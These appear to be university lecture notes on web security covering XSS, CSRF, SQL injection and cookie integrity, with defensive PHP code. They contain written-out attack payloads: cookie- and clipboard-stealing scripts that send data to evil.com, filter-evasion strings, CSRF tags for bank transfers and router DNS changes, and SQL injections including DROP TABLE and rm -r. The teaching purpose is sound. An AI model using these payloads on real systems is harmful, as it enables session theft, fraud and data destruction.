Bob visits www.ucc.ie and a new browser window pops up (the JavaScript also originates from www.ucc.ie).

    var w = window.open("http://www.ucc.ie");
    // Wait a while, hoping they'll start using the newly opened window.
    // After 10 seconds, let's try to see what URL they're looking at!
    var snoopedURL;
    setTimeout(function () { snoopedURL = w.location.href; }, 10 * 1000);

Bob's browser executes the script as it obeys the same-origin policy. However, suppose that this script was loaded from www.evil.com; then the access to w.location.href would fail/be blocked by the browser, as it references a different document origin.

Many of the variables that can be accessed by a JavaScript program are relative to the current document.
For example, the following script sends any cookies related to the current document to the site www.evil.com.

    <script>
    document.location = 'http://www.evil.com/steal.php?cookies=' + document.cookie
    </script>

If the page www.evil.com embedded this JavaScript then it will send any cookies related to this document/website to itself. If Alice's website foo.bar embedded this JavaScript, then when Bob visits her site the program sends his cookies to www.evil.com. In principle this is not an issue, since it's Alice's decision to include this code on her website and, in visiting Alice's web-page, Bob presumably trusts Alice's intentions.

XSS Example, the Vulnerability

Alice's web application allows users to enter comments on a web-page. The following form is used.

    <form action="comment.php" method="post">
    <p>Name: <input type="text" name="name" /><br />
    Comment: <textarea name="comment" rows="10" cols="60"></textarea><br />
    <input type="submit" value="Add Comment" /></p>
    </form>

The application displays comments to other users who visit the page. Suppose that the comment-viewing application (web-page) includes the following code to output a single $comment and corresponding $name.

    <?php
    echo "<p>$name writes:<br />";
    echo "<blockquote>$comment</blockquote>";
    ?>

XSS Example, Exploiting the Vulnerability

A malicious user of this application can embed any HTML within their name and comment (request), and this HTML will form part of the application response to another user reading the comments. For example, Malicious Mike's request includes:

    $name=Mike
    $comment=<p><script>alert('Code from Alice');</script></p>

When Bob reads Mike's comment, the server response includes the HTML

    Mike writes:<br />
    <blockquote><p><script>alert('Code from Alice');</script></p>
    </blockquote>

and a pop-up message appears on Bob's screen! This is an example of a fairly benign attack.
However, suppose that malicious Mike makes a request to comment.php that includes (in $comment)

    <script>
    document.location = 'http://evil.com/steal.php?cookies=' + document.cookie
    </script>

Now, when Bob views Mike's comment on Alice's website, Bob's cookies (for Alice's web application/site) are sent to evil.com. This attack occurs because malicious Mike manages to embed his own malicious code in the HTML response from Alice to Bob.

XSS Attack Payloads

The above example demonstrates cookie-stealing code as an XSS payload (session hijacking). Other kinds of payload include the following.
- Virtual defacement, which does not modify the underlying server data but interferes with the way that it is rendered on a web-page.
- Trojan horse. Injected XSS code adds new functionality to the website, for example asking the user for credit-card details.
- Masquerading as the user. The JavaScript code performs some action (e.g. administrative) as the user.
- JavaScript that directly attacks the user. For example, other applications may use the clipboard but not clear it after use. Steal clipboard data with

      'http://evil.com/steal.php?clip=' + window.clipboardData.getData('Text');

  (of course, this attack is not limited to just XSS)

Detecting XSS Vulnerabilities

A simple strategy for testing for XSS vulnerability is to use the attack string

    "><script>alert(document.cookie)</script>

which should be submitted as every parameter to every page of an application, with the responses monitored. Some applications use simple blacklist filters that look for <script> strings within request parameters and remove, encode or block the request. They might not detect all possible variants of a script call:

    "><script>alert(document.cookie)</script>
    "><ScRiPt> alert(document.cookie)</ScRiPt>
    "%3e%3cscript%3ealert(document.cookie)%3c/script%3e
    ...

Simply checking for <script>, etc., may be problematic if the response already includes <script>: the attacker may be able to inject their own code within this response.
For example, the PHP code may include

    echo "<script>var a='$myParameter'; .... </script>"

and the attacker simply terminates the single quotation marks around $myParameter and injects their own code into the request

    $myParameter= ' \'; alert(document.cookie); '

and the resulting response looks like

    <script>var a=' '; alert(document.cookie); .... </script>

Avoiding XSS

XSS occurs as a result of a poorly implemented Web application not properly filtering and cleaning its input/output data. Avoid XSS by:
- Disabling scripting in the browser.
- Educating users.
- Validating input.
- Filtering output.
- Encoding properly.

Avoiding XSS in PHP

You should at least use htmlentities() to escape any data that you send to the client. This function converts all special characters into their HTML entity equivalents. Any character that the browser interprets in a special way is converted to its HTML entity so that its original value is preserved.

    $cleanName=htmlentities($name, ENT_QUOTES, 'UTF-8');
    $cleanComment=htmlentities($comment, ENT_QUOTES, 'UTF-8');
    echo "<p>$cleanName writes:<br />";
    echo "<blockquote>$cleanComment</blockquote>";

This converts:
- & to &amp;
- " (double quote) to &quot;
- ' (single quote) to &#039;
- < (less than) to &lt;
- > (greater than) to &gt;

Use html_entity_decode() to retrieve the original string, if needed.

Reflected XSS

The XSS attacks described above are called persistent XSS attacks, whereby the attacker manages to embed JavaScript into your site's database. A reflected XSS attack occurs when the attacker embeds JavaScript into a link to your site and tricks a user into following it.
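Whether the script arrives via the database (persistent) or via a link parameter (reflected), the defence on output is the same escaping step. The sketch below shows it in Python rather than PHP, using the standard library's `html.escape` as a stand-in for htmlentities(); `render_comment` is a hypothetical helper name introduced only for this illustration.

```python
import html


def render_comment(name: str, comment: str) -> str:
    """Build the comment HTML with every user-supplied value escaped.

    quote=True also escapes single and double quotes, which matters when
    a value ends up inside an HTML attribute.
    """
    safe_name = html.escape(name, quote=True)
    safe_comment = html.escape(comment, quote=True)
    return (
        "<p>" + safe_name + " writes:<br />\n"
        "<blockquote>" + safe_comment + "</blockquote>"
    )


if __name__ == "__main__":
    # Malicious Mike's comment is rendered as inert text, not as a script.
    print(render_comment("Mike", "<script>alert('Code from Alice');</script>"))
```

The browser then displays the angle brackets literally instead of interpreting them as markup, so the injected script never runs.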
    http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script>
    http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript%20src=http://ckers.org/s%3E
    http://groups.google.com/group/rec.sport.prowrestling/browse_thread/thread/1ab38554971acfc9')&+eval(alert(document.cookie))&+eval('?tvc=2
    http://search.live.com/images/results.aspx?q=1&rst=21&FORM=PEIR"><script>alert('securitylab.ru')<script>

(All from http://xssed.com/)

Detecting XSS in the Browser

In principle, it is a good idea to disable scripts in the browser and use a plugin such as NoScript to selectively enable scripts for 'trusted sites'. Simple reflected XSS attacks are relatively easy to detect in the browser. For example, MS Internet Explorer 8 and the Firefox plugin NoScript block reflected XSS attacks. Of course, these just provide defence in depth for the client and do not 'protect' the server.

Conclusions

A cross site scripting vulnerability provides an attacker with a way to bypass JavaScript's same-origin security policy. You should filter and clean all input data to a web application and check that it is as expected. Web applications should also escape everything on output and only un-escape data that you know is safe and that you know contains markup you want to execute. Developers should test web applications for XSS by injecting attack strings (automated tools are available). Browser controls provide a useful defence-in-depth/additional check for users but do not make the web application any more secure.

Using HttpOnly Header in HTTP Response

If the HttpOnly flag in the HTTP response header is set then the cookie cannot be accessed through a client-side script (if the browser supports this flag). As a result, even if an XSS flaw exists, and a user follows a link that exploits this flaw, the browser will not reveal the cookie to a third party.
If a browser does not support HttpOnly and a website attempts to set an HttpOnly cookie, the HttpOnly flag will be ignored by the browser, thus creating a traditional, script-accessible cookie. This flag can be set in PHP as a default in php.ini using session.cookie_httponly, or programmatically by setting the parameter httponly to TRUE:

    session_set_cookie_params(lifetime[,path][,domain][,secure][,httponly])

Cross Site Request Forgeries

Cross Site Attacks

A Cross Site Scripting (XSS) attack occurs when a malicious user inserts code into a web-page that a user trusts. A Cross Site Request Forgery (CSRF) occurs when a malicious website causes a user's web browser to execute an unwanted action on a trusted site.

The HTML <img> Tag

Insert an image into an HTML document.

    <img src="http://foo.bar/someImage.gif">

This instructs the browser to (silently) download an image using the request:

    GET http://foo.bar/someImage.gif HTTP/1.1

The <img> tag causes an HTTP GET request by the browser regardless of the value of the given URL. The browser does not know beforehand whether the URL is a gif, jpg or something else. It needs to load/GET it into the browser in order to determine this. After all, the image could be generated by some program.

    <img src="http://foo.bar/getCurrentImage.php">

Alice is Authorised to Access the foo.bar Website

Suppose that foo.bar provides an application that can be used to set the current image. For example, Alice requests:

    GET http://foo.bar/setCurrentImage.php?imageID=1234

in order to set the current image to image 1234. Suppose that the website uses HTTP Basic authentication to control who may access/set the image, and Alice has access to the website. Malicious Mike does not have access but would like to change the current image to 5678. He needs to trick Alice into submitting the HTTP request:

    GET http://foo.bar/setCurrentImage.php?imageID=5678
    ..
    Authorization: Basic ......
    (Alice's credentials)

Malicious Mike is not Authorised to Access foo.bar

Suppose that Malicious Mike owns the website evil.com and the web-page index.html on this site includes

    <img src="http://foo.bar/setCurrentImage.php?imageID=5678">

Alice visits evil.com/index.html and the image tag causes Alice's browser to silently perform

    GET http://foo.bar/setCurrentImage.php?imageID=5678
    .....

Note that we assume here that Alice has configured her browser to 'remember' her userid/password from some previous visit to the foo.bar website and that the browser does not prompt her to confirm entry.

CSRF and Same Origin Security Policy

A Cross Site Request Forgery occurs when an attacker can get a victim to perform an unwanted action on another site (where the victim holds the authorization to carry out the action). A CSRF attack attempts to exploit authorizations that the victim already holds. If the user has logged on to a website (and holds session authentication cookies) then the attacker will try to get the user to carry out an action that is authenticated by those cookies.

The same origin policy was designed to prevent an attacker from accessing data on a third party site. The policy does not prevent requests from being sent; it only prevents an attacker from reading the data returned from the third party server. Since CSRF attacks are the result of the requests sent, the same origin policy does not protect against a CSRF attack.

More CSRF Attacks

There have been many examples of CSRF-based exploits. These include:
- A CSRF vulnerability on ingdirect.com (2008, online banking) whereby an attacker can transfer money out of a victim's online bank account. For example,

      <img src=http://www.mybank.com/transfer.do?fromAccount=document.form.frmAcct&toAccount=4590&amount=3434>

- YouTube.com (2007), whereby an attacker can add videos to the victim's account, add himself to the friend/family groups of the victim, share the victim's contacts, flag videos, etc.
- Making changes to home DSL routers (2006), even if the victim doesn't know that he can configure his router! The attacker's website uses CSRF with the default userid/password for the router:

      <img src=http://admin:password@192.168.1.1/>

  and then re-configures it, for example to change the DNS:

      <img src=http://192.168.1.1/changeDNS?newDNS=143.23.45.1>

Strategy to Help Avoid CSRF Attack?

You want to force users to use your own forms when submitting data to your website. The problem with the above attacks is that the websites allowed GETs, whereby the data can be provided in the URL as a parameter. Any data that is going to be acted upon by a website should be submitted via a POST. Forms should use POST. Your PHP script should use $_POST and not $_REQUEST in the form processing logic.

This still won't work! The attacker can create an HTML page that includes a POST form with hidden fields for all of the relevant parameters required for the attack and has its target set to the vulnerable URL. JavaScript (or Flash) is used to automatically submit the form when the exploit is loaded.

Cookies Alone Won't Prevent CSRFs

If a web application relies solely on HTTP cookies as its mechanism for transmitting session tokens then it is still at risk from this attack. Cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

Preventing CSRF Attacks Using Synchronizer Tokens

The strategy to avoid CSRF is for the application to include a synchronizer token in the HTML form. This is a secure random value that is stored in a hidden field in the form (often called CSRFToken).
Every request for the form yields a different value embedded in the form, and the attacker cannot guess the value in a form presented to another user.

    <form action="/transfer.do" method="post">
    <input type="hidden" name="CSRFToken"
    value="OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZjMTViMGYwMGEwOA==">
    .....
    </form>

When data, presumably from this form, is submitted to the application, the application must look for the synchronizer token and check that it has the expected value. This interaction is a simple form of challenge-response protocol whereby the application expects to see its challenge embedded in the form as part of the response from a client.

We must be careful how we implement the synchronizer tokens. For example, a naive implementation might maintain a list of issued synchronizer tokens in the application:
- Check that the token in a POST is on this list.
- The list will become very large unless we only keep track of recently issued tokens and let older tokens expire.
- We need to relate the token to the session, otherwise a malicious user could first request a form in order to obtain a valid and fresh token which is then used in a CSRF involving the form.

But this places a burden (state) on the application. A better strategy is to make it stateless by also 'embedding' the synchronizer within the session cookie. On receiving the HTTP request, the application then checks that the token provided in the form matches the value embedded in the cookie. The attacker will need to know the cookie value in order to construct a valid-looking request and carry out the CSRF attack.

Implementing the CSRF Synchronizer in PHP

We modify the setCurrentImage form to include a hidden CSRFToken field with a randomly generated value. This token is unique to, and is stored in, the user's session.
(A weaker token is md5(uniqid(rand(), TRUE)).)

    <?php
    session_start();
    // hex-encode the random bytes so the token can be embedded safely in HTML
    $CSRFToken = bin2hex(openssl_random_pseudo_bytes(32));
    $_SESSION['CSRFToken'] = $CSRFToken;
    $_SESSION['token_time'] = time();
    ?>
    <form action="setCurrentImage.php" method="post">
    <input type="hidden" name="CSRFToken" value="<?php echo $CSRFToken; ?>" />
    <p>
    Symbol: <input type="text" name="imageID" /><br />
    <input type="submit" value="Set" />
    </p>
    </form>

The application setCurrentImage.php can now check a request for the correct token.

    <?php
    session_start();
    if (isset($_POST['CSRFToken'], $_SESSION['CSRFToken'])
        && $_POST['CSRFToken'] === $_SESSION['CSRFToken']
        && time() - $_SESSION['token_time'] <= 300)
    {
      // valid request via the form that was recently
      // issued to the user in this session
    }
    ?>

This strategy works so long as the attacker cannot discover the session cookies and synchronizer token transmitted to/from the user/application.

Avoiding CSRF

At the Server:
- Allow GET requests to only retrieve data, not modify any data on the server. This protects sites from CSRF attacks using <img> tags or other types of GET request.
- Require all POST requests to include a synchronizer token.
- If really critical, use CAPTCHAs, ...

At the Client:
- Log off immediately after using a Web application.
- Do not allow your browser to save usernames/passwords, and do not allow sites to remember your login.
- Do not use the same browser session to access sensitive applications and to surf the Internet freely (tabbed browsing).
- The use of plugins such as NoScript makes POST-based CSRF vulnerabilities difficult to exploit.
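The synchronizer-token check can also be sketched outside PHP. The following is a minimal Python illustration, assuming the session is available as a plain dictionary; `issue_csrf_token`, `is_valid_csrf_request` and `TOKEN_LIFETIME_SECONDS` are hypothetical names chosen for this example, and the 300-second window simply mirrors the PHP check in these notes.

```python
import hmac
import secrets
import time

TOKEN_LIFETIME_SECONDS = 300  # same freshness window as the PHP check


def issue_csrf_token(session: dict) -> str:
    """Generate a fresh random token and remember it in the session."""
    token = secrets.token_hex(32)  # 32 random bytes, hex-encoded for HTML
    session["CSRFToken"] = token
    session["token_time"] = time.time()
    return token


def is_valid_csrf_request(session: dict, form: dict, now=None) -> bool:
    """Accept the request only if the form token matches the session token
    and the token was issued recently."""
    expected = session.get("CSRFToken")
    submitted = form.get("CSRFToken")
    issued_at = session.get("token_time")
    if not expected or not submitted or issued_at is None:
        return False
    if now is None:
        now = time.time()
    if now - issued_at > TOKEN_LIFETIME_SECONDS:
        return False
    # constant-time comparison of the two tokens
    return hmac.compare_digest(expected.encode("utf-8"),
                               str(submitted).encode("utf-8"))


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    print(is_valid_csrf_request(session, {"CSRFToken": token}))
    print(is_valid_csrf_request(session, {"CSRFToken": "forged"}))
```

A forged cross-site POST fails this check because the attacker's page cannot read the token that was embedded in the form issued to the victim.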
SQL Injection

Login Application (variation)

Suppose that a login application provided a Forgot Password page whereby a user who has forgotten their password can request it to be sent to their email address:

    <form action="http://foobar.com/request.php" method="GET">
    <p> Email Address: <input type="text" name="email" /></p>
    <p> <input type="submit" /></p>
    </form>

For simplicity, we'll assume an unsalted password table:

    CREATE TABLE `passwordTable` (
      `username` varchar(8) NOT NULL,
      `password` varchar(8) NOT NULL,
      `email` varchar(30) NOT NULL,
      PRIMARY KEY (`username`)
    );

Suppose that the request.php script includes the code:

    $myemail=$_GET['email'];
    // $tbl_name is the password table
    $sqlQ="SELECT * FROM $tbl_name WHERE email='$myemail'";
    $result=mysql_query($sqlQ);
    $count=mysql_num_rows($result);
    if($count==0) {
      exit ("No user with this email address ".$myemail);
    }else{
      $row= mysql_fetch_array($result);
      $body= "your password is ".$row["password"];
      $subject = "Your password";
      mail($myemail,$subject,$body);
      echo 'Password mailed to '.$myemail;
    }

Discovering Registered Users

Malicious Mike uses this form to test for email addresses of registered users. For example, the request

    http://foobar.com/request.php?email=h.simpson@cs.ucc.ie

might result in the "No user with this email [...]" message, while

    http://foobar.com/request.php?email=s.foley@cs.ucc.ie

results in a message "Password mailed to s.foley@cs.ucc.ie".

SQL Injection Attack 1

Malicious Mike makes the HTTP request:

    http://foobar.com/request.php?email=h.simpson@ucc.ie' OR 1=1 --

This results in the following SELECT in the application:

    SELECT * FROM $tbl_name WHERE email= 'h.simpson@ucc.ie' OR 1=1 -- '

(note that the -- starts an SQL comment, which makes the database ignore the trailing quote). This selects the entire table, and the particular (poor) logic in the application will take one of the selected rows and email the password to the user. For example, malicious Mike gets the message "Password mailed to m.murphy@ucc.ie" and deduces that this is a registered user!
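The effect of the injected string can be reproduced with a small self-contained experiment. The sketch below uses Python's built-in sqlite3 module with an in-memory database instead of PHP and MySQL; the rows, the helper names `build_demo_db` and `vulnerable_lookup`, and the passwords are made up for illustration only.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Create an in-memory copy of passwordTable with two made-up users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE passwordTable ("
        "username TEXT PRIMARY KEY, password TEXT NOT NULL, email TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO passwordTable VALUES (?, ?, ?)",
        [("mmurphy", "secret1", "m.murphy@ucc.ie"),
         ("sfoley", "secret2", "s.foley@cs.ucc.ie")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, email: str) -> list:
    """Deliberately unsafe: the input is pasted straight into the query text."""
    query = "SELECT username, email FROM passwordTable WHERE email='" + email + "'"
    return conn.execute(query).fetchall()


if __name__ == "__main__":
    conn = build_demo_db()
    # An unknown address matches nothing...
    print(vulnerable_lookup(conn, "h.simpson@ucc.ie"))
    # ...but the injected condition makes the WHERE clause true for every row.
    print(vulnerable_lookup(conn, "h.simpson@ucc.ie' OR 1=1 --"))
```

The second lookup returns every row in the table even though the address itself is not registered, which is exactly the behaviour Mike exploits.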
SQL Injection Attack 2

An SQL injection attack may occur if input data is not properly parsed. In our example we should have checked that the input data was a properly formed email address. IETF document RFC 3696, Application Techniques for Checking and Transformation of Names, specifies the only acceptable format for an email address. The PHP function filter_var can be used to do limited filtering/checking of email addresses, URLs, etc. For example,

    filter_var('bob@example.com', FILTER_VALIDATE_EMAIL);

returns the email address if valid, otherwise false. Note that filter_var() does not conform to RFC 3696 and will pass a number of strings that are not proper email addresses, for example s.foley@ucc. See http://www.iamcal.com/publish/articles/php/parsing_email/ for a well designed filter.

Exploiting Injection Attacks

Suppose that the login.php script allows up to three failed login attempts before disabling the account. We could use SQL injection to directly test the backend for userid/password combinations and bypass the 3-attempts control. Having discovered that m.murphy@ucc.ie is in the table, malicious Mike guesses passwords:

    http://foobar.com/request.php?email=m.murphy@ucc.ie' AND password='attempt1

which translates into the backend query

    SELECT * FROM $tbl_name WHERE email= 'm.murphy@ucc.ie' AND password='attempt1'

Malicious Mike knows that he has guessed the correct password for the user when he gets a "Password mailed to m.murphy@ucc.ie" message.

More SQL Injections

A variety of statements can be injected in this way. For example,

    http://foobar.com/request.php?email=x'; INSERT INTO passwordTable VALUES ('simon', 'nomis', 's.foley@cs.ucc.ie'); --
    http://foobar.com/request.php?email=x'; DROP TABLE 'passwordTable
    http://foobar.com/request.php?email='; shell_exec('rm -r *'); --

SQL injection attacks may require the attacker to know the table and attribute names in the backend database. However, if the attacker does not know this information he can test and/or guess it.
For example, GET and POST parameter names may provide a hint about table attribute names. Also, most DBMSs store information about the database in tables with predefined names. For example, mysql.user gives the table of MySQL database users and may be accessible if the web application happens to be running with the same permissions as the database administrator (root).

Avoiding SQL Injection Attacks: Escaping Strings

Your application should filter input data: check that input is as expected. Your application should escape output: ensure that data sent to the database cannot be misinterpreted. For example, "O'Sullivan" should be output to the database as "O\'Sullivan". Use the function mysql_real_escape_string() to escape special characters in the unescaped string so that it is safe to place it in a mysql_query().

    $myemail= $_GET['email'];
    $filteremail= filter_var($myemail, FILTER_VALIDATE_EMAIL);
    $cleanemail= mysql_real_escape_string($filteremail);
    // ...
    $sqlQ="SELECT * FROM $tbl_name WHERE email='$cleanemail'";
    // ....

Don't forget that the result of a query might in turn be used as part of a further query to the DBMS (and therefore should be escaped).

Avoiding SQL Injection Attacks: Escaping Integers?

Escaping parameters using mysql_real_escape_string() is OK for strings, but it may not work for integer parameters. For example, suppose our table had another (integer) attribute userid, then:

    $myuserid= $_GET['id'];
    $cleanuserid= mysql_real_escape_string($myuserid);
    // ...
    $sqlQ="SELECT * FROM $tbl_name WHERE userid=$cleanuserid";
    // ....

The problem here is that the query assumes an integer parameter and is therefore written without quotes. An injection attack string "1 OR 1=1 -- " does not need the breaking quote, and contains no characters for the escaping function to change, so SQL interprets the query as

    SELECT * FROM $tbl_name WHERE userid=1 OR 1=1 --

The solution is to either use quotes in the query or validate/clean the input value as an integer (so it really is clean).
    $cleanuserid= filter_var($myuserid, FILTER_VALIDATE_INT);

Avoiding SQL Injection Attacks: Prepared Statements

To further defend against the possibility of SQL injection attack we can define the intended SQL queries as prepared statements (parameterised queries, sometimes loosely grouped with stored procedures), which ensure that the intended query cannot be modified by injected data.

    $myemail= $_GET['email'];
    $filteremail= filter_var($myemail, FILTER_VALIDATE_EMAIL);
    // ...
    $preparedStatement = $db->prepare("SELECT * FROM $tbl_name WHERE email = :email");
    // the value is bound separately from the query text, so it is not escaped by hand
    $preparedStatement->execute(array(':email' => $filteremail));
    $rows=$preparedStatement->fetchAll();

Any parameters passed to the compiled query will be treated as data and cannot be misinterpreted as part of the query command. Passing the string "h.simpson@ucc.ie' OR 1=1 --" will simply result in a search for a user with email "h.simpson@ucc.ie' OR 1=1 --".

Defence in Depth

- Use prepared statements, filter input, ...
- Do not give your application root access to the DBMS. A compromised application with root access can do far more damage than an 'ordinary' database user, since it can access the database administration tables (users, etc.), drop arbitrary tables, etc. Create a separate database user for your database application.
- Do not run the DBMS using the administrator account (e.g. root) of the operating system. An injection attack on an application running on a DBMS that is running as root could use shell_exec to execute any operating system command. Create a separate system user to run the DBMS.
- Prevent PHP from calling OS commands. Disable shell commands in the php.ini configuration file: set the directive disable_functions to include exec, shell_exec, system, proc_open, popen, ...
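Binding the value separately from the query text can be demonstrated with a short self-contained sketch. It uses Python's built-in sqlite3 module and an in-memory table rather than PHP and MySQL; the rows and the helper names `build_demo_db` and `safe_lookup` are assumptions made for this illustration.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Create an in-memory copy of passwordTable with two made-up users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE passwordTable ("
        "username TEXT PRIMARY KEY, password TEXT NOT NULL, email TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO passwordTable VALUES (?, ?, ?)",
        [("mmurphy", "secret1", "m.murphy@ucc.ie"),
         ("sfoley", "secret2", "s.foley@cs.ucc.ie")],
    )
    return conn


def safe_lookup(conn: sqlite3.Connection, email: str) -> list:
    """The ? placeholder is filled in by the driver, so the email value is
    always treated as data and never as part of the SQL command."""
    return conn.execute(
        "SELECT username, email FROM passwordTable WHERE email = ?",
        (email,),
    ).fetchall()


if __name__ == "__main__":
    conn = build_demo_db()
    print(safe_lookup(conn, "m.murphy@ucc.ie"))
    # The injection string is just an (unregistered) email address here.
    print(safe_lookup(conn, "h.simpson@ucc.ie' OR 1=1 --"))
```

With the placeholder in place, the injection string matches no rows: the database searches for a user whose email is literally that whole string.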
Conclusion

SQL injection results from:
- Failure to filter input data to the application.
- Failure to escape output from the application to the database.

Avoiding SQL injection attacks:
- Filter input data to the application.
- Escape output from the application to the database.
- Principle of least privilege: don't give the application more authority (DBMS, OS, etc.) than it requires. Don't run it as root/superuser.

Cookies & Sessions

Cookies

The HTTP protocol is stateless. All HTTP requests are treated as independent events, even when they come from the same client. Cookies provide a mechanism whereby a web-server can manage a stateful relationship with a browser by storing the related state in the client browser and not on the server.
- The server assigns some state to a cookie, which it includes in the HTTP response.
- The browser stores the cookie locally.
- The browser includes any cookie(s) it may hold for a website when making an HTTP request to that website.

Cookies can be used to store a variety of information, for example visit tracking information, authentication information, etc.

Secure Cookies

An attacker can eavesdrop on an HTTP connection and gather copies of cookies. This is a concern if the cookie contains sensitive information such as usernames and passwords. HTTPS can be used to support authentic and secure HTTP requests and responses: the client may be sure of the identity of the server, and the requests/responses are sent in encrypted form. The secure flag in a cookie is set by the web-server and indicates that the cookie should only be transmitted over a secure HTTPS connection from the client. When set to TRUE, the cookie will only be set if a secure connection exists. It is up to the developer to decide whether the web application sends this kind of cookie and to be sure that the connection is over HTTPS. The browser will ignore a secure cookie that is not received over HTTPS.
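As a rough illustration of what the server actually sends, the sketch below builds a Set-Cookie header value carrying both the Secure flag described above and the HttpOnly flag discussed earlier in these notes. It uses Python's standard http.cookies module rather than PHP; `build_session_cookie_header` and the cookie name and value are hypothetical.

```python
from http.cookies import SimpleCookie


def build_session_cookie_header(name: str, value: str) -> str:
    """Return the value of a Set-Cookie header with Secure and HttpOnly set."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    cookie[name]["secure"] = True    # only send the cookie over HTTPS
    cookie[name]["httponly"] = True  # hide the cookie from client-side scripts
    return cookie[name].OutputString()


if __name__ == "__main__":
    # The server would emit this string after "Set-Cookie: " in its response.
    print(build_session_cookie_header("sessionid", "abc123"))
```

Both attributes are instructions to the browser, so they only help when the browser honours them and the site is actually served over HTTPS.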
Cookie Integrity

An attacker that controls the connection can also interfere with the cookie values. HTTPS can be used to secure the connection from this kind of attack. Once the browser receives the cookie, a malicious client can easily modify the cookie value (either directly, or via a proxy such as Paros). The server can use a cryptographic one-way hash function to ensure the integrity of a cookie value.

Attempted solution: given a cookie with identifier id and value v, and some secret known only to the server, compute a cryptographic checksum using a suitable one-way hash function h():

    ck = h(v, secret)

and include this hash value in the cookie. An attacker cannot forge ck without knowing the secret. Before using a cookie presented by the browser, the application should re-compute the checksum and confirm it matches the checksum provided.

PHP script protecting the integrity of the variable value

    <?php
    $secret="my server secret";
    $separator = '--';
    if (!isset($_COOKIE['views'])){
      $views=1;
    }else{
      $cut=explode($separator, $_COOKIE['views']);
      // a cookie without exactly one separator cannot be one of ours
      if (count($cut)==2 && md5($cut[0].$secret)===$cut[1]){
        $views=$cut[0]+1;
      }else{
        die('Cookie data corrupted');
      }
    }
    $splice=$views . $separator . md5($views.$secret);
    setcookie('views',$splice,0,"/");
    echo "I have now seen you = ". $views . " times";
    ?>

Problems With The Script

The script only attempts to prevent the cookie variable value v from corruption: it implements the cookie as [id, v, d, p, h(v, secret)]. A malicious client could take a copy of the cookie [id, v, d, p, h(v, secret)] and change, for example, the expiry date to d′, resulting in the valid cookie [id, v, d′, p, h(v, secret)]. A determined and malicious client might have another cookie [id′, v′, d′, p′, h(v′, secret)] from the same server for a different variable id′. If the same secret was used to compute the checksum of this cookie then the attacker can cut-and-paste the variable value together with its checksum to give, for example, the 'valid' cookie [id, v′, d, p, h(v′, secret)].
We need to secure all the values in the cookie from modification.

A Tasty (Good) Cookie Recipe

Given cookie attributes
- $secret, a server secret,
- $id, a variable identifier,
- $v, a value for the variable,
- $d, an expiry date,
- $p, path information, ...

compute a checksum $ck = h($id,$v,$d,$p,$secret, ...), given a suitable one-way hash function h() and the server $secret. sha1 is a reasonable one-way hash function for this. Then we do setcookie($id, "$v--$ck", $d, $p), where -- is the separator that lets us distinguish between the variable value and the checksum.

A Tasty (Good) Cookie Script

    <?php
    $secret="my server secret";
    $id='views';
    $expiry=0;
    $path="/";
    $separator = '--';
    if (!isset($_COOKIE[$id])){
      $views=1;
    }else{
      $cut=explode($separator, $_COOKIE[$id]);
      $views=$cut[0];
      $values=$views.$id.$expiry.$path.$secret;
      if (count($cut)==2 && md5($values)===$cut[1]){
        $views=$views+1;
      }else{
        die('Cookie data corrupted');
      }
    }
    // the checksum covers every attribute plus the secret; the secret itself is never sent
    $splice=$views . $separator . md5($views.$id.$expiry.$path.$secret);
    setcookie($id,$splice,$expiry,$path);
    echo "I have now seen you = ". $views . " times";
    ?>

No Perfect Cookie

A determined and malicious client can still replay 'old' cookies with this recipe. For example, when visiting for the fifth time, the client keeps a copy of the cookie. At some later date, when the client visits for the tenth time, the client can easily replay the old fifth cookie. The server could include a sequence number in the hashed cookie and then keep track of the last sequence number issued to each client. However, this requires state at the server side, which defeats the purpose of the cookie. If we are concerned about replay of cookie state then the server should manage the state and use, for example, a PHP session to relate the state to the visiting client (we'll see this shortly).
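The recipe of binding every cookie attribute into the checksum can be sketched as follows. This is an illustration in Python rather than PHP, and it swaps the plain hash h(id, v, d, p, secret) for the standard HMAC construction with SHA-256, which is a common way to key a hash with a server secret. The names `make_cookie_value`, `read_cookie_value`, `SEPARATOR` and `SERVER_SECRET` are hypothetical.

```python
import hashlib
import hmac

SEPARATOR = "--"
SERVER_SECRET = b"my server secret"  # placeholder; keep the real one private


def _checksum(cookie_id: str, value: str, expiry: int, path: str) -> str:
    """Keyed checksum over all attributes, so none can be changed or swapped."""
    message = "|".join([cookie_id, value, str(expiry), path]).encode("utf-8")
    return hmac.new(SERVER_SECRET, message, hashlib.sha256).hexdigest()


def make_cookie_value(cookie_id: str, value: str, expiry: int, path: str) -> str:
    """Return 'value--checksum', the string stored in the browser."""
    return value + SEPARATOR + _checksum(cookie_id, value, expiry, path)


def read_cookie_value(cookie_id: str, raw: str, expiry: int, path: str):
    """Return the value if the checksum verifies, otherwise None."""
    value, sep, supplied = raw.rpartition(SEPARATOR)
    if not sep:
        return None  # no separator: not a cookie we issued
    expected = _checksum(cookie_id, value, expiry, path)
    if hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8")):
        return value
    return None


if __name__ == "__main__":
    raw = make_cookie_value("views", "5", 0, "/")
    print(read_cookie_value("views", raw, 0, "/"))
    # Pasting the same value under another identifier no longer verifies.
    print(read_cookie_value("other", raw, 0, "/"))
```

As the notes point out, a checksum of this kind detects modification and cut-and-paste between cookies, but it does nothing to stop a client replaying an older cookie that was valid when issued.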
Authentication Cookies

When a user logs in (e.g. authenticated using the login.php code described earlier in the notes), an authentication cookie is set in the browser by the login program for the website and path.

    user → website : HTTP request, ... userid, password
    website → user : HTTP response, ... AuthCookie

